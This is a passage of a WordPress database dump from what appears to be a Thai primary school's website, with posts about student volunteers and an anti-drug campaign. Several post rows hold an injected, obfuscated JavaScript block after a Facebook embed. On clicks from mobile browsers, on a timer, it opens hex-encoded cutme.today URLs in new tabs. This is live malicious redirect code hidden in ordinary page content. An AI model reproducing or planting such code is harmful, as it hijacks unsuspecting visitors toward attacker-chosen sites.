_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ขอบคุณน้องๆจิตอาสาจากโรงเรียนกันทรลักษ์วิทยา ที่มาบำเพ็ญประโยชน์ที่โรงเรียนบ้านหนองปลาเข็ง-กอไหล่ของเรา','','publish','closed','closed','','%e0%b8%82%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b8%e0%b8%93%e0%b8%99%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%86%e0%b8%88%e0%b8%b4%e0%b8%95%e0%b8%ad%e0%b8%b2%e0%b8%aa%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%81%e0%b9%82','','','2024-07-27 11:20:19','2024-07-27 04:20:19','',0,'http://pakhaeng.ssk.in.th/?p=92',0,'post','',0),
(93,1,'2024-07-27 11:20:13','2024-07-27 04:20:13','','449454973_976271077623897_4313101419573319686_n','','inherit','','closed','','449454973_976271077623897_4313101419573319686_n','','','2024-07-27 11:20:13','2024-07-27 04:20:13','',92,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/449454973_976271077623897_4313101419573319686_n.jpg',0,'attachment','image/jpeg',0),
(94,1,'2024-07-27 11:20:18','2024-07-27 04:20:18','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%2Fposts%2Fpfbid03yQQzYTuGmLGigSuhf8YSNG7oikoVbMU6dAxLbwsUvPkxYjnbhnNhuJwhRKergbxl&show_text=true&width=500\" width=\"500\" height=\"664\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ขอบคุณน้องๆจิตอาสาจากโรงเรียนกันทรลักษ์วิทยา ที่มาบำเพ็ญประโยชน์ที่โรงเรียนบ้านหนองปลาเข็ง-กอไหล่ของเรา','','inherit','closed','closed','','92-revision-v1','','','2024-07-27 11:20:18','2024-07-27 04:20:18','',92,'http://pakhaeng.ssk.in.th/?p=94',0,'revision','',0),
(95,1,'2024-07-27 11:21:43','2024-07-27 04:21:43','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%2Fposts%2Fpfbid02wxut69fe997oBuGVF7QLYW96y85xi6AQHqrQ9zdSZHVaeDKp9jTxRvQVEPqXe8Ehl&show_text=true&width=500\" width=\"500\" height=\"780\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ได้จัดกิจกรรมวันต่อต้านยาเสพติดโลก เพื่อรณรงค์ให้นักเรียนและชุมชน 